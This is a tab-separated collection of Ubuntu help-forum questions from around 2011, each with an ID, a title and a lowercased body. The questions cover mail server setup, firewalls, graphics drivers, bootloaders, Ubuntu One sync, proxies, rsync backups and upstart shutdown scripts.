61467	different mailbox formats for special dovecot/system users	on a server me and a friend set up we 're currently using mbox mailbox format . ( think i should mention that my friend set up the mail part of the server and i yet do n't know too much about mailserver configuration ... ) as i like the subfolder capability of maildir format i 'd like to have maildir format instead , but i do n't want to influence the other users mailboxes on that system . somewhere in dovecot wiki i read that it 'd be possible to change the mailbox format for single users thru settings in the according userdb . in /etc/dovecot.conf i 've seen , that we 're using /etc/passwd as userdb file ( it says `` userdb passwd { ... '' in dovecot.conf ) what i did now , was creating a testuser and appending : userdb_mail=maildir : /home/maildirtest/maildir at the end of the `` maildirtest '' user in /etc/passwd . when i now attached that account to my thunderbird mail client , a `` mail '' directory got created inside the users home folder . i also tried restarting dovecot , but yet did n't have any success using maildir for that single user . i meanwhile also created and chown'ed a maildir directory in the mentioned folder with sudo maildirmake.dovecot /home/maildirtest/maildir maybe i should also tell , that we 're using postfix as mta and i 'd also need this part to be working in that configuration . hope someone has an idea on how to get that working .
61468	precautionary security measures for a home user ? ( firewall , antivirus , etc )	i just recently made the switch from windows to ubuntu , and i 'm just a little paranoid when it comes to security measures . i 've looked around and from what i 've read , security is not as big a concern as on a windows os , but i just want to make sure i 'm somewhat covered . currently , i have installed clamtk anti-virus and gufw ( and enabled it once ) . so basically i have three questions : aside from those apps , updating regularly , and downloading from trusted sources only , should i be taking any other precautions ? must i do anything more with gufw other than checking enabled or are the default settings ( incoming : deny , outgoing : allow ) sufficient ? do i have to manually turn on gufw everytime and enable it ( and keep it open ) ? everytime i open it the enabled checkbox is unchecked . edit : when i open gufw , i must unlock and enter my password , however the checkbox is now checked . must i always open gufw did i simply need to enable it once ? thank you .
61470	partial upgrade	i recently attempted to upgrade my 11.04 to 11.10 , but the upgrade failed . now whenever i open the update-manager it asks to do a partial upgrade . is there a way to get it to upgrade or atleast stop it from asking about the partial upgrade ?
61471	ubuntu one state still processing , process sleeping , not transfer uploads/downloads	greetings ubuntu one support , i install ubuntu 11.04 x86 and i have a 100mb interent connection . i payed for addtional 20gb pack for backup my photos , and i select my whole `` ~/pictures '' folder for sync ... but the daemon never upload the files ... user @ user-lap : ~ $ u1sdtool -s state : queue_manager connection : with user with network description : processing the commands pool is_connected : true is_error : false is_online : true queues : working user @ user-lap : ~ $ u1sdtool -- current-transfers current uploads : 0 current downloads : 0 using `` magicicada '' i can see all the 7,470 files queued with the operaiton `` upload '' ... but nothing happen ! i check in the one.ubuntu.com/files/ and there is the empty folders . i was waiting for more than 2hrs and nothing get transferd everytime that i restart my laptop , ubuntu one upload just 1 file ... i ca n't restart my computer 7,470 times for transfer all my data . i check the ubuntu one status in https : //wiki.ubuntu.com/ubuntuone/status ... and there says that the file service is working ... there is a very long log about it at ./cache/ubuntuone/log/syncdaemon.log , but it just repeats something like : 2011-09-20 11:19:14,479 - ubuntuone.syncdaemon.interactioninterfaces - debug - called current_status 2011-09-20 11:19:14,481 - ubuntuone.syncdaemon.dbus - debug - called current_uploads i noticed that when was uploaded 100 % of a large file ( video ) remains in that status and never disappears from the queue in the ubuntuone-indicator ... i do not see the file in the web-interface one.ubuntu.com what happen ? this service really does n't work ?
61475	trying to install eclipse or codeblock	i am new to using ubuntu , and so in need of some help getting my development box up and running . i am trying to develop c++ code , but when i try to install codeblock ide or eclipse indigo , i run into some wall . when i attempt to use ubuntu software to install eclipse indigo , i get an error about my internet connection `` failed to download package file , check your internet connection '' ( i use wireless and have no problems using the internet ) . when i try to install codeblock , i get the same error . is there some configuration issue i have not handled here ? i am running ubuntu on vmware . any help will be very much appreciated .
61476	can wubi harm my pc ?	i am just wondering can wubi 11.04 make windows unbootable in anyway and what harm can it do to my pc . also , if i force shut down in wubi ubuntu can it damage windows ?
61487	how to move vlc window by clicking on video ?	in windows/os x i could move the vlc windows in which a video was playing by clicking on the title bar and by clicking on the video itself . how can i enable this functionality in ubuntu ? i 'm using ubuntu 11.04 with vlc 1.1.9 .
61491	after upgrading to 11.04 , there 's no icons , no menus , nothing	i 've just upgraded from 10.04 - > 10.10 - > 11.04 and after the reboot , i 'm presented with my desktop wallpaper , a mouse cursor ... . and that 's it ! i was able to get to firefox , but only by hitting the power button , clicking help , and then selecting `` get help online '' . alt-f2 does n't show the run dialog , so i 'm unable to get to a terminal or anything ! any ideas or help ? update : i was able to boot in recovery mode and started the root terminal with network access . apt-get remove ubuntu-desktop & & apt-get ubuntu-desktop did not change anything
61495	lenovo ideapad s10-3 does n't resume from suspend	i have recently installed natty on my lenovo ideapad s10-3 netbook . i have a problem : while i 'm able to put my computer to suspension , it just wo n't wake up when i open the lid or press a key ( any key ) . some of the indicators show activity ( power , battery and wireless connection ) , but the display wo n't get turned on and the hd stops working . at the end , i always have to brutally power of the machine by holding power . what could be causing this errror ? i have an ideapad s10-2 ( the predecessor to s10-3 ) and it has absolutely no problem with the suspend option . i 've noticed that at the login screen - before logging in - i can suspend and resume without problems . when i log in the suspend function fails . i then tried to log out and suspend but it did n't resume . the other day i was at a friends house and logged in . i was n't connected to his wireless network since it was n't on my list of networks ( fresh install of ubuntu ) . i then suspended and resumed - when logged in - with no problems at all . after connecting to his network it failed again . that made me try suspending and resuming after disabling wireless connections by flicking off the switch on the side of the netbook . no dice . next up i tried disconnecting from the wireless network from the connections applet in the status bar and then suspending and resuming . no dice this time either . i tried sebastian 's answer , but it does n't work . i did update the grub and all . no dice . it starts to annoy me big time . any suggestions ? ?
61501	gnome3 problem on ubuntu 11.04 by graphic	i have install gnome3 on my ubuntu 11.04 but it do n't work as well as it must . like this picture : enter link description here
61503	how to start mongodb server on system start ?	i have to start my mongodb server every time the system restarts . how do i configure it to start with my os ? i am on ubuntu 11.04 .
61510	how to i install glassfish on ubuntu from the command line ?	i have a linux machine ( ubuntu ) and i installed glassfish and everything worked fine . the thing is , i was using linux from the desktop ui and the installer featured a graphical wizard . i am wondering , if i create a linux virtual machine on amazon ec2 or rackspace , i can only access the linux from the command line using ssh . how do i install glassfish from the command line ? wo n't the graphic install wizard attempt to display and fail ? any help is appreciated .
61514	can i temporarily hide indicators to reduce clutter ?	i currently have 9 indicators ( old-style and new-style appindicators ) sitting in my ubuntu taskbar . in time i 'm sure some of them will migrate to a better location ( for example , i presume both spideroak and dropbox are supposed to be under the mail indicator , just like ubuntu one ) . until then , i want to reduce the clutter ! in windows there is an option to hide ( but not remove ) system tray icons . [ 1 ] when you click on a reveal button , the hidden icons are revealed and you can use them as normal . is there a similar function in ubuntu ? [ 1 ] i could remove old-style non-appindicators from the systray-whitelist , but it would be a major hassle when i want to show them again .
61515	what 's the driver version for my ati graphics card ?	how do i find out if i have the latest driver for an ati radeon hd 5770 graphics card ? the amd website has the ati driver 11.8 but before i try to install it , i 'd like to find out whether i already have it installed or not .
61516	how to know what other systems are trying to get into ubuntu ?	i am currently using ubuntu desktop 11.04 and enabled the firewall using gufw . i have also disabled all the unnecessary services . i am connected to the internet and would like to know details of any other systems trying to scan my system for any open ports or for any vulnerabilities . is there any software which will log this into a file , which i can check ? note : i am looking for an approach which can be followed by novice users of ubuntu and not only by experts . gui is preferred .
61520	best driver for ati radeon hd4250	i am relatively new to ubuntu . i saw my friend 's pc running ubuntu and tried it out of curiosity . i started with 10.10 on my old pc with an nvidia 7300gs graphics card . it would occasionally freeze but other than that it was all good . ( i was using the proprietary drivers ) but a month back i bought a new one ( amd x4 955be/ 8 gb/ radeon hd4250 ) and dual booted win 7/ ubuntu 11.04 . the issue is that the video performance is absolutely horrible . even standard definition videos are unwatchably choppy . this is huge deal breaker for me , since i use my pc mostly for watching movies . i downloaded the proprietary drivers but it seemed like they dragged down the performance even more . i also installed 11.04 on my friends laptop ( a dual core with intel hd graphics and 2gb ram ) , and it works like a dream . my friend says that she has n't had to login to windows 7 once in the last three weeks . 1080p videos play just fine without the need for any proprietary drivers . i would like to know if there is anything else that i can try , because i really like ubuntu and would like to have to login to windows only when i absolutely have to . ps : i am using the ubuntu 11.04/x64 whereas the one on my friend 's laptop is the 32 bit version .
61523	either blank screen during boot or poor resolution console in ubuntu server within virtualbox	i 'm setting up a test platform in virtualbox , the host system is ubuntu lucid desktop , and the guest system is ubuntu lucid server . the basic server installation provides 80x25 console with slow scrolling and slow screen updates . this has been fixed by blacklisting vga16fb . after that i got 80x25 console with quick screen updates and scrolling . then i tried to disable splash screen and quiet mode by editing /etc/default/grub , removing splash and quiet default boot parameters from grub_cmdline_linux_default . after that i got boot messages quickly displayed during the boot on 80x25 console . then i tried to set up higher resolutions in console . i provided a desired graphics mode in /etc/default/grub file with grub_gfxmode parameter , and set grub_gfxpayload_linux parameter to keep to keep the graphics mode persistent in console . after that i have a desired resolution in grub menu , desired resolution in console , but the boot messages between grub boot line selection and login screen are now invisible ( black screen ) . how to configure grub and console so that all parts of the boot process - grub , boot messages and console login - are visible in a desired resolution console ? upd : things go better once i provide fbcon module for initrd : edit file /etc/initramfs-tools/modules and add a fbcon line there , then rebuild the initrd by issuing update-initramfs -vu . all as root , of course . after that i started to see boot-up messages , first of them saying console : switching to colour frame buffer device 128x48 . however , some of the boot-up output goes into different console mode ( like fsck messages ) , and i see the screen switching there and back again . but still that 's much more than blank screen .
61525	how do i fix a shutdown problem ?	often i can not perform a soft shutdown or restart . the desktop might sound the console error sound once and then nothing happens . i end up having to use the pushbutton momentary switch , holding it depressed until a shutdown happens . i 've had this problem for months . there is no particular discernible cause . the problem is not well correlated with the number or kind of apps that have been run . typical use : eclipse ide , transmission , firefox browser , gedit , and occasionally openoffice . what should i check to resolve this problem ? i 'm thinking of wiping the disk and reinstalling but a little annoyed because i would have to first check the quality of my backup ( boring ) .
61526	ca n't change startup programs in startup application preferences	i opened and changed startup programs in startup application preferences . then after reboot the preferences did n't change , they are the same as it was before . why i ca n't change nothing and how to really setup startup application preferences ? thanks .
61527	how can you get the menu bar to act differently for maximized and small windows in unity ?	when the window is maximized the menu of that application is in the global menu , but on a small window the menu would be nice to remain with the window ( old school ) . how you can do that ? it 's really annoying if you work with a small window on the lower side of the screen specially if you use a touchpad .
61534	plugging in external hard drive freezes desktop ?	i have a western digital wd element 500gb external hdd ( ntfs formatted ) . when i plug it in , the system freeze but my mouse still can move ( but can not be used ) . sometimes it can be mounted but when i try to copy data to it , the system crashed again . i tried to start ubuntu with the external hdd already plugged in ( i plugged it in before start machine ) and couldnt access the system any more . it appearred the black screen with something like this : '' busybox 1.17 ... .etc . enter help to see built-in commands . '' at first i thought it was the grub problem but it wasnt . i still can choose what os at the grub screen .
61538	how can i set exceptions for metacity/gnome window-styles ?	i have kde and metacity as window manager enabled with a dark theme , but i 'm having a few problems with it and firefox . the default and my preferred style of firefox is light and not dark , but firefox adopts the dark theme of metacity / gnome and so my text boxes etc . are dark too , which looks horrible . so my question is , how can i set exceptions or extra settings for gnome so firefox does not adopt the gnome theme and set up a light one for it ? btw , i 'm using kubuntu with metacity as window manager .
61539	what do i need to tell a developer if i want them to move their indicator under a system indicator menu ?	as a follow-up to my question on reducing indicator clutter and the implication that apps are supposed to group themselves under existing indicators i 'd like to submit requests to one or four developers to group their apps accordingly . what resources exist to help developers do this ? are there existing guidelines on where apps should group themselves ? for example , spideroak and dropbox presumably ought to follow the example of ubuntu one , but what about truecrypt or transmission remote gui ? are there existing guides/tutorials on how to create a working subindicator ? what if they use libraries other than gnome ? ( for example , if they use qt ) are there any known pitfalls ? how can they easily future-proof their work ? would any of this work be beneficial to deployment outside ubuntu ?
61540	how to update software through proxy ?	i am a newbie to ubuntu/linux . i am using ubuntu in office campus and we have a proxy server . i want to update or install new software like flash , media player , networking tools etc. , but i am unable to install from the synaptic package manager . i have created an apt.conf file which contains acquire : :http : :proxy `` http : //192.168.1.6:3128/ '' ; i also have an apt.conf.d file but its empty and i do n't know what to do with this file . this is the error i encounter when i try to update : e : syntax error /etc/apt/apt.conf.d/proxy:3 : extra junk at end of file e : syntax error /etc/apt/apt.conf:2 : extra junk at end of file
61543	stty does n't work	i 've changed shortcuts for terminal to copy , ctrl+c , paste , ctrl+v , and interrupt the application , ctrl+j . copy and past works fine but interruption doesn't.the terminal just does n't react on ctrl+j shortcut . so then i should put command stty intr ^j for every session to make terminal work properly . is there the possibility to fix this problem ?
61549	how do i configure irssi ?	i am using irssi client for irc chat and i would like to know how to configure the ~/.irssi/config file so that i can put in my username and password ( i have a registered nick in the irc ) . also i 'd like to know if i can configure it to open multiple terminals ( as in gnome-terminal windows ) to connect to different channels like # ubuntu , # ubuntu-in and so on . or should i alias the command with different parameters so as to connect to different channels from different terminals .
61550	how do i fix an installation error message saying : executing grub-install /dev/sda3 failed ?	when installing the newest ubuntu 11.04 on an acer aspire 1 netbook , the installer said no bootable programs found or something to that effect , so i made another partition of 5 gigs and attempted to install there . i currently have wary puppy installed on the 1st partition . went through the install , then the error message said : executing grub-install /dev/sda3 failed this is a fatal error file report at https : //launchpad.net/ubuntu/+ source/ubiquity/+ filebug include details + bug report + attach these files /var/log/syslog /var/log/partman : neither of these files are in the partition 's /var/log/ folders .
61556	how do i install an older version of the php5-mhash package ?	i have my php version pinned at 5.2.x , here is the command line output php -version php 5.2.10-2ubuntu6 with suhosin-patch 0.9.7 ( cli ) ( built : oct 23 2009 16:30:10 ) copyright ( c ) 1997-2009 the php group zend engine v2.2.0 , copyright ( c ) 1998-2009 zend technologies running this command to install php5-mhash : sudo apt-get install php5-mhash here is the error message reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : php5-mhash : depends : php5-common ( = 5.2.10.dfsg.1-2ubuntu6.10 ) but 5.2.10.dfsg.1-2ubuntu6 is to be installed e : broken packages my question is how do i fix this ? can i install an older version of php5-mhash and if so , how do i do that ? i am open to any suggestions . here is the output from running : sudo apt-get install -f : reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded .
61557	how do i set up ssh authentication keys ?	i am using ssh to connect to a remote server . i am prompted to provide a password each time , but i recall being able to set up a sort of authentication key , so that passwords were not required . however , it has been ages , and i have forgotten just about everything about it , except the word `` key '' . one of those things you set up and forget , and i never quite understood it to begin with . how is it done ?
61558	what 's the difference between openjdk and sun java for the end user ?	for users running java application or applets in the browser , what difference does it make running either sun java or openjdk ? edit oracle will be retiring the dlj , and basing the proprietary implementation on openjdk . can we expect similar experience in running java apps using either openjdk or oracle jdk ?
61559	ubuntu @ mylaptop will boot only when failsafe graphics mode selected ( several errors )	suddenly can not boot into ubuntu . i am running ubuntu 11.04 at my asus laptop . laptop specs : cpu : i5-2410m @ 2,3ghz ram : 4gb gpu : nvidia gforce gt 520m / ( also the cpu has a graphics processor ) i get these errors when i am trying to boot normally : http : //tinypic.com/r/mrdvt/7 http : //tinypic.com/r/2ccvtci/7 http : //tinypic.com/r/2uz9p9j/7 http : //tinypic.com/r/242v0j8/7 http : //tinypic.com/r/rab81z/7 i can only boot at ubuntu using the recovery and the failsafe graphic option.. using lspci | grep vga at the terminal , i get this : 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation device 1050 ( rev a1 ) what is wrong ? what should i do ?
61563	ubuntu one ca n't login	i have my laptop upgraded to oneiric and ca n't sync with ubuntu one anymore . therefore i deleted : rm -r ~/.config/desktop-couch/ rm -r ~/.local/share/desktop-couch/ rm -r ~/.cache/desktop-couch/ and removed the desktopcouch entries from the gnome keyring . if i now start ubuntuone-control-panel-gtk i can click on existing account but always get back to the start screen . what should i do ? p.s . i now also deleted the ubuntu one token from the keyring and after that i could relogin again . but on the services pane i get the message : there is no ubuntu one pairing record . i now also executed without success : dbus-send -- print-reply -- dest=com.ubuntu.sso /credentials \ com.ubuntu.sso.applicationcredentials.login_to_get_credentials \ `` string : ubuntu one '' `` string : workaround for lp:657850 '' int64:0
61566	`` hibernate '' and `` suspend '' options are gone , clicking on `` shut down '' just logs me out	i installed oneiric and then updated it . so i rebooted my netbook , samsung n150 . after logging in , i clicked the power cog . i was surprised to see that `` hibernate '' and `` suspend '' were gone . when i clicked on `` shut down '' , it did n't shut down . instead , it logged me out . to turn off the netbook , i had to go into the terminal and execute sudo halt . what can i do to restore the functionality of the menu ?
61567	how do i change to a theme not listed in the appearance screen ?	i just upgraded to 11.10 for better or worse . when i launch `` appearance '' i see only ambiance/radiance themes available in /usr/share/themes and ~/.themes there are other themes that are n't listed , so i 'm curious where are themes located .
61571	is it safe to switch my bootloader to burg ?	i have ubuntu 11.04 and windows on a single hard disk . after reading it became clear that there are some options to have the bootloader changed into a screen with just the ubuntu and windows icon . right now i have some purple window ( grub i guess ) with i think 6 or 7 options to choose from ; ubuntu , ubuntu safe mode , windows loader and some others i can not remember now . burg has some nice features , but i read about issues that people are not able to get into the system anymore . what are my options ?
61573	how to select a certain window/program via keyboard in gnome ?	i am using ubuntu 11.04 with the gnome desktop . i usually have firefox and a terminal open , besides other stuff . now i am looking for a way to select each program directly via keyboard - something faster faster than alt+tab , e.g . alt+f1 : switch to firefox alt+f2 : switch to terminal any ideas ? can this be done independent of gnome , so i could switch to fluxbox or something else ?
61574	how to exclude previously deleted files from a new rsync copy ?	extending on this question : automatically sync a folder to a usb when usb is plugged in ? i do not want an automatic script but just a small bash script to do the following : copy current ~/documents/ to a backup folder copy newer files from usb/documents to ~/documents/ copy and carry over deletions from ~/documents/ to usb/documents/ i now have : # backup local : rsync -av ~/documents/ ~/backup20112012/documents/ # synch new files from usb : rsync -auv /media/20cc-a5e5/documents/ ~/documents/ # sync and delete usb : rsync -av -- delete ~/documents/ /media/20cc-a5e5/documents/ which works with one exception . if i delete a file in ~/documents , it is created again in step 2 ( cause it is on usb ) . is there a way to omit copying files that have been deleted in step two ?
61577	ubuntu one refuses my 11 character login	okay , i go to register in ubuntu one . everything looks good . i put in an 11 character password b*********1 , with one major character and one number , but i keep on getting the error message that i have to have at least 8 characters , one capital or major letter and one number . now if this is n't what was asked for , as i marked above , what is wanted ?
61589	how to enable flash for google chrome 13 ?	i 'm on ubuntu 11.04 natty and i wan na use google chrome , but in about : plugin there are only 3 plugins : chrome nacl ( disabled ) , chrome pdf viewer and default plug-in - version : 1 . how do i install flash for this version of chrome on 64 bit ubuntu ?
61590	kernel panic when booting from usb	i downloaded ubuntu-11.04-desktop-amd64.iso and used universal-usb-installer-1.8.6.3.exe to format my usb stick und put the iso on it . when i tried to install from it , i 've got a kernel panic just like here , except for the version number ( mine was 2.6.38-8-generic # 42-ubuntu ) . my iso image seems to work , as i installed it into a vmware player without problems . booting linux from usb works surely too , as i did it some time ago with an older ubuntu version . i can imagine things to try out , e.g. , write the image again , try another version , pray , look for patches , etc . however , i 'm looking for a time-efficient solution , something what most probably works . an advice of the sort `` wait two weeks until it 's surely fixed , then download again '' is acceptable , i 'm determined to switch to linux , but it can wait a bit .
61592	how do i get remote a x connection to work ?	i have removed -nolisten from xserverrc and changed /usr/share/gdm/gdm.schemas to be disallowtcp false and added disallowtcp=false in /etc/gdm/custom.conf , but still i can not connect remotely to the xserver . any ideas on what next to try ?
61593	how stable is the ubuntu one nightly build ppa ?	i am using ubuntu 10.04 so it is an older version of ubuntu one and had no control panel . i noticed there is a lucid version in the nightly build ppa and was wondering how stable it is
61595	how to sync folder other than photos in ubuntu one files for android	my ubuntu one files android app has uploaded all my photos succesfully . i have uploaded a separate file which i also have synced on my ubuntu pc . changes made on the pc sync to the cloud but it seems like i have to manually upload and download the changes to my phone from the cloud . is it possible to set a file or folder on my phone to automatically sync the same way the auto-upload photos seems to sync
61596	installing ubuntu onto a computer that does n't have an operating system	i 'm getting a computer later on today , one without an operating system . i ca n't afford an operating system , so i 'm thinking of going with the free ubuntu instead of pirating one . how would i go about doing this ? can anyone link me to a tutorial for this ? will it work the same as getting it onto a computer with an operating system ?
61600	what is a script and how do i write one ?	there are a couple of times i have been presented with some codes as solutions to problems . my question is how do write these type of scripts myself for some fairly routine tasks ?
61604	how long does wubi take ?	how long does wubi take ( not to download ) but during the install after the windows reboot ? for me it should be a short download ( about 10 min ) but how long will it take after ?
61611	how to setup multiple partitions	i have a google cr-48 notebook . the ssd only has 6 gb that i am comfortable allocating to ubuntu . i need to move /usr to an external hdd . i also will move my /home to another partition on the drive . i am going to specify the requirements that i must meet . i can not install ubuntu again i can not use liveusb or livecd or livedvd i can not boot the entire os from the usb drive i can not do anything that requires grub ( grub is not installed or utilized , trust me i am certain ) i can not boot into recovery mode ( reboot recovery or pressing button as both require grub ) at all i want to know if it can be done and how it can be done in detail . i have tried this many times . each time something new went wrong . i am asking for assistance on how to do something , i do n't want anyone saying `` moving the /usr directory is a bad idea '' or anything of that nature . if i had another option that i felt comfortable with i would n't be asking this question . any assistance that anyone could provide would be greatly appreciated . i will provide more details in the future if requested/required . i am sorry for my pessimism , but after 5 re-installs my patience grows a little thin . thank you !
61615	what does `` missing operating system '' on boot mean ?	so i 've got my new computer now , one without any operating system . i have my ubuntu all ready on a usb , it 's plugged into the computer . i turn on the computer , it shows a splash screen , then it goes to the black with white text mode ( maybe called terminal ? ) and says `` missing operating system '' . what do i do ?
61617	migration from ecryptfs to full-disk encryption	i 'm thinking if i should move from the ecryptfs $ home encryption to a full-disk encryption . what is the most recommended tool i can use for this full-disk encryption , and what is the best tutorial available on how to migrate from ecryptfs ? free and open source a big plus . i know those are technically two questions , but the 1st question is just an opening to the 2nd .
61619	upgrading ubuntu with encrypted $ home	i 've heard cases of people who had problems with ecryptfs-encrypted $ home when upgrading their ubuntu versions . is there any truth in that , and if yes how to upgrade without problems ?
61624	is making a clean install enough to remove potential malware ?	is formatting the disk and reinstalling the system from scratch ( to ubuntu ) enough to remove any potential hidden software spyware , keyloggers etc. ? or can something still persist installed in the bios or something like that ? what to do then ? to be clear , not concerned about malware . the question is more specific about a machine to which people other than the user had physical access for many hours . so when the user returns can not be sure nothing changed . so the user makes a fresh install after some weeks . is that enough to `` clean '' it ?
61625	enabling nvidia graphics on ubuntu 11.04	i 've been struggling this for quite some time and it 's come to a point where looking at my screen hurts my eyes because i think my video driver settings are all messed up . additional drivers says i have nvidia accelerated graphics driver but they are `` not currently in use '' ( screen shot below ) . how the heck do i put them to use ? ? nvidia x server settings says that i do n't have nvidia x drivers and to edit nvidia-xconfig ( screen shot below ) . i did that and all hell broke lose , my system would only start in terminal mode so i had to go to recovery mode and put x setting back to default . please tell me a way of how to active my nvidia driver settings ? update my video card is : evga 512-p3-1301-kr geforce 8400 gs 512mb 32-bit ddr3 pci express 2.0 x16 hdcp ready low profile video card http : //www.newegg.com/product/product.aspx ? item=n82e16814130608 i re-installed the nvidia-current driver and some changes happened . i still have `` not in use '' but i can launch nvidia-settings from terminal so i guess it actually is installed now now i cant see my second monitor ... its just blank screen clicking on minimize and maximize buttons has not effect monitor that does turn on does not show top and bottom bars where time and tasks are .
61627	how do system wide proxy settings work ?	back in windows land , it was only chrome and ie and few other softwares that used ie 's internal proxy settings . i 'm interested to know how does it work in ubuntu/linux in general ? often just setting the http_proxy environment variable would be caught by the program , it seems to me , but it is all that open network-proxy does ? can softwares neglect this setting , by making direct connections ? is it actually up to them to decide ? or if once i set a system wide proxy setting , it re-routes everything ?
61628	why are the applications repeated multiple times in the `` open with other application ... . '' option ?	i am using ubuntu 11.04 desktop and when i right click on a particular folder and select `` open with other application ... . '' , some of the applications are repeated multiple times . this is happening with more than one application . i was able to get rid of them from the `` edit menu '' option , but why does this happen and how to make sure it does n't happen again ?
61631	why do n't the function key options and play/pause/volume work on a mac bluetooth keyboard ?	i am currently running ubuntu 11.10 with all updates . i have been using ubuntu very successfully on my macbook pro ( 5,5 ) for a few years now . i also have a apple bluetooth keyboard . on the laptop keyboard and bluetooth keyboard i can use the extra function keys ( volume , play , pause etc ) as expected . and i get page up/down with fn+up and fn+down and start/end with fn+left and fn+right . the other day i purchased a 2nd apple bluetooth keyboard for use at work . it appears the same , although perhaps some upgraded components ( my 1st one is ~2 years old ) . however none of the fn options work nor the play/pause/volume . this problem seems to be keyboard specific rather than ubuntu-wide as i can use the fn keys on my laptop keyboard , while simultaneously being unable to use them on my external bluetooth keyboard . any suggestions or ideas about where to start ? i think the bluetooth keyboards are linked to the macbook pro range , so perhaps i have the drivers installed for my laptop ( macbook pro 5,5 ) and this new keyboard is similar to a newer macbook pro for which i do n't have adequate drivers .
61632	how to check if a latex package has been installed ?	how to check if a latex package has been installed in ubuntu ? when installing , i followed the methods mentioned in http : //math.arizona.edu/support/tex/accountpackages.html and http : //en.wikibooks.org/wiki/latex/packages/installing_extra_packages .
61634	how to boost volume in lubuntu 11.04 on laptop	the audacious audio player volume is fine , but when i try to watch videos on youtube the volume is far too low . is there a way to boost the overall sound ? thank you for your time .
61635	nautilus `` unable to mount < volume > '' and `` not authorized '' and lightdm keeps sending me back to login screen on shutdown and restart	using nautilus i ca n't get my internal or external volumes to mount and get `` unable to mount `` and `` not authorized '' after an update of ubuntu 11.10 beta and also i can not reboot normally instead i need to reboot using terminal as root . notes that i can mount my volumes using terminal as root . rebooting and shutting down just send me back to unity-greeter lightdm login screen .
61637	where is the user 's profile picture stored in gnome 3 ?	in ubuntu 11.10 , i can set my profile picture through the user accounts settings panel . i can select an existing picture and it will help me crop that picture to look nice . the final product is not stored in the same ~/.face file used in gnome 2 . in fact , i do n't know where it is stored and i would love to know ! any ideas ?
61639	fan speeds up at suspend	the fans start turning at very high speed when i do suspend . what is the reason , and if possible , how can i fix it ? the mainboard i use is intel dg45fc . cpu is intel core 2 duo at 3.00ghz .
61641	how to change the default program for pdf ( only for current user )	on ubuntu 10.10 i would like to change my default pdf viewer to acroread . i do not have sudo privilidges , so i want to make this change for my own user only . acroread is already installed .
61643	sequential hook before entering runlevel ?	i have a very specific problem and i 've been fighting upstart all night with no success . i my particular case , i have a server with a bunch of pxe booted clients . the data for the clients is stored in mysql . when i shut down the server , before anything happens , i need all the pxe clients to be turned off as well . in the old , sequential world of sysvinit this was a piece of cake : just put the remote shutdown script early in the sequence , before networking , portmap , nfs , mysql go down . this was ok even if it took 10 minutes for all the clients to go off ( but usually 30 seconds would be enough ) . with upstart i ca n't for the life of me get the clients to shutdown before the server . i managed to get the script executed before mysql went down , but that is n't enough , as it seems that the network and/or other support stuff that the pxe clients really need goes down , so they nfs mounts go up in smoke and they never power off . they will power off as soon as the server is back up though . the closest i got to getting what i want is this : kill timeout 70 start on runlevel [ 016 ] and ( stopping mysql or stopping portmap or stopping idmapd or stopping statd ) task exec the-script-that-shuts-clients-down.sh the script tells all the machines to shut down then keeps an eye on them ( sending pings once a second ) , and only when either they 're all down , or the script gets bored and gives up , should the server continue the shut down sequence . now , with upstart , my script gets killed after about 7 seconds . even with the 70 second timeout as above . ideally , i 'd like to execute that script before anything else is triggered by the runlevel switch , but google says i 'm out of luck on this one . there 's no sequential mechanism in upstart - even `` backwards compatibility '' rc is executed in parallel with the rest of the upstart services . any ideas on this one ? i 'm running ubuntu 10.10 .
61644	auto-start and play mp3s from usb stick	is there a way that i could auto start a music player and play mp3s from a usb stick immediately after my computer has booted up ? ideally the music player would play each mp3 file on the usb stick in turn .
61646	universal remote-wireless keyboard & mouse	hello i 've got xbmc setup running on ubuntu 10.10 , so far i use a usb keyboard and mouse plugged into the pc to control it , and the pc in general . can anyone recommend a single wireless integrated keyboard and mouse ( one device with both functions ) , that can connect wirelessly to my computer so that i can navigate , type and do all the functionality i have with 2 wired devices ?
61649	how do i get unity to launch `` log file viewer '' as root ?	by default , `` log file viewer '' is not launched from unity as root in ubuntu 11.04 . this is pretty useless , as most of the log files are only readable by root . how can i change this behavior so that it launches as root ?
61650	how can i migrate my data from evolution to thunderbird ?	since it will be the new standard email-client in the upcoming distribution , i thought about taking a look at thunderbird . now my first issue is : how can i migrate all my data ( contacts , email , account settings ) from evolution to thunderbird with as little trouble as possible ? i did already search the internet , but all i could find was outdated information ... gr33tz panmari
61655	display anomaly - any ideas	ubuntu 11.04 shows this kind of white pixels across text . any ideas what they are caused by ? and what to do about it ? i 'm using an acer aspire 1604z laptop .
61661	why ca n't i check for updates in ubuntu 11.04 ?	i get the following error message when i try to check for updates : w : failed to fetch http : //ppa.launchpad.net/dists/https/ppa/ubuntu/natty/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/dists/https/ppa/ubuntu/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/dists/https/ppa/ubuntu/natty/binary-i386/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/dists/https/ppa/ubuntu/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . what can i do to correct this ? this is a new installation of natty . i installed updates only once , and subsequently i have only received this error message when trying to check for more updates .
61668	enable zoom in and out on touchpad	i can use the touchpad scrolling with two fingers . the os is natty and my laptop is a thinkpad x220 . but the touchpad does n't support zoom in and out . any suggestion ?
61670	garbled ui with vnc , chicken-of-the-vnc , gridengine , qmon	ubuntu 11.04 gridengine version 6.2u5-1ubuntu1 i start a desktop with the vncserver command . my ~/.vnc/xstartup ends with 'gnome-session ' . i connect to it using chicken-of-the-vnc on my macosx lion system . i run 'qmon ' . much of qmon works , but several critical tasks show hopelessly garbled grid layouts . i have filed a bug report , but i suspect that there is something i am missing that would render ( ahem ) them legible .
